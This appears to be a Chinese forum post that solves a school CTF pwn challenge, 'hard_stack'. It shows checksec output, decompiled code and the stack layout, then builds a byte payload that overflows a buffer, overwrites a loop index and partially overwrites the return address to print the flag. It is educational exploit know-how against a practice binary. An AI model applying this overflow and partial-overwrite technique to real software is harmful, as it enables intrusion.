用户国营 发表于 2024-4-1 08:13:59

hard_stack

简记一道学校的pwn题
先 checksec 一下
┌──(kali㉿helloeveryone)-[~/ctf/pwn/q20_hardstack]
└─$ checksec --file=hard_stack
[*] '/home/kali/ctf/pwn/q20_hardstack/hard_stack'
    Arch:   amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled没有金丝雀, 地址随机化, 用户栈不可执行
再丢进ida看眼,F5一下
main:
int __cdecl main(int argc, const char **argv, const char **envp)
{
FILE *stream; //

setvbuf(stdout, 0LL, 2, 0LL);
stream = fopen("flag.txt", "r");
if ( !stream )
{
    puts("Something wrong with flag file.");
    exit(0);
}
fgets(s, 64, stream);//将字符串读到s中
sub_400acd();
puts("Bye~");
return 0;
}sub_400acd:
ssize_t sub_400acd()
{
ssize_t result; // rax
char buf; // BYREF
int i; //

puts("Who are you?");
for ( i = 0; ; ++i )
{
    result = read(0, buf, 1uLL);                //一次从缓冲区读一个字节
    if ( result != 1 )
      break;
    result = (unsigned __int8)buf;
    if ( buf == '\n' )
      break;
    buf = buf;                        // 漏洞:只要没有读入换行符或EOF就会一直读,造成栈溢出
}
return result;                              // 可以劫持程序流程
}在ida里看看其他函数
找到一个获得flag的函数 sub_40076d
int sub_40067d()
{
return puts(s);                               //s即为刚刚读取flag的字符串地址
}现在可以分析一下漏洞函数 sub_400acd 的栈了
-0000000000000040               db ? ; undefined
-000000000000003F               db ? ; undefined
-000000000000003E               db ? ; undefined
-000000000000003D               db ? ; undefined
-000000000000003C               db ? ; undefined
-000000000000003B               db ? ; undefined
-000000000000003A               db ? ; undefined
-0000000000000039               db ? ; undefined
-0000000000000038               db ? ; undefined
-0000000000000037               db ? ; undefined
-0000000000000036               db ? ; undefined
-0000000000000035               db ? ; undefined
-0000000000000034               db ? ; undefined
-0000000000000033               db ? ; undefined
-0000000000000032               db ? ; undefined
-0000000000000031 buf             db ?
-0000000000000030 var_30          db ?
-000000000000002F               db ? ; undefined
-000000000000002E               db ? ; undefined
-000000000000002D               db ? ; undefined
-000000000000002C               db ? ; undefined
-000000000000002B               db ? ; undefined
-000000000000002A               db ? ; undefined
-0000000000000029               db ? ; undefined
-0000000000000028               db ? ; undefined
-0000000000000027               db ? ; undefined
-0000000000000026               db ? ; undefined
-0000000000000025               db ? ; undefined
-0000000000000024               db ? ; undefined
-0000000000000023               db ? ; undefined
-0000000000000022               db ? ; undefined
-0000000000000021               db ? ; undefined
-0000000000000020               db ? ; undefined
-000000000000001F               db ? ; undefined
-000000000000001E               db ? ; undefined
-000000000000001D               db ? ; undefined
-000000000000001C               db ? ; undefined
-000000000000001B               db ? ; undefined
-000000000000001A               db ? ; undefined
-0000000000000019               db ? ; undefined
-0000000000000018               db ? ; undefined
-0000000000000017               db ? ; undefined
-0000000000000016               db ? ; undefined
-0000000000000015               db ? ; undefined
-0000000000000014               db ? ; undefined
-0000000000000013               db ? ; undefined
-0000000000000012               db ? ; undefined
-0000000000000011               db ? ; undefined
-0000000000000010               db ? ; undefined
-000000000000000F               db ? ; undefined
-000000000000000E               db ? ; undefined
-000000000000000D               db ? ; undefined
-000000000000000C               db ? ; undefined
-000000000000000B               db ? ; undefined
-000000000000000A               db ? ; undefined
-0000000000000009               db ? ; undefined
-0000000000000008               db ? ; undefined
-0000000000000007               db ? ; undefined
-0000000000000006               db ? ; undefined
-0000000000000005               db ? ; undefined
-0000000000000004 var_4         dd ?
+0000000000000000s            db 8 dup(?)
+0000000000000008r            db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variablesbuf 和 var_30 占45字节,属于 buf , var_4 则是变量 i
由此,可以有一种思路: 将 buf 溢出覆盖 i 实现栈上任意写
构造payload:
payload=b'a'*44+b'\x37'+b'\x42'前44个a是垃圾占位字符,填充 -0000000000000030 到 -0000000000000005 (ps:因为 -0000000000000031 总是储存当前字符)
后面写一个 0x37 , 即将 i 改成55。这是考虑到for循环后要有 i++ , 即下一次写入的地址是 buf[(i++)+1] , 此地址即为 buf = -0x31+0x39=0x8 , 就是返回地址的第一个字节
下面解释payload最后一字节:
首先,地址随机化只是进行页的随机化,一页的大小是 0x1000 , 也就是说同一页上地址的后三位不会改变。
其次,小端储存,是指以字节为单位,低数位储存在低地址,高数位储存在高地址。返回地址是 call    _sub_400acd 指令的下一条,地址即 0x00000000000008D8 , 所以我们最后是将上述地址覆盖成 0x0000000000000842 , 这正是 sub_40067d() 的地址。这样我们就把程序劫持到该函数上打印flag
PS: 由于金丝雀是在栈上变量之后, rbp 和返回地址之前,我们可以通过数组索引避开金丝雀实现栈溢出,所以本题开了 canary 也可以做

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: hard_stack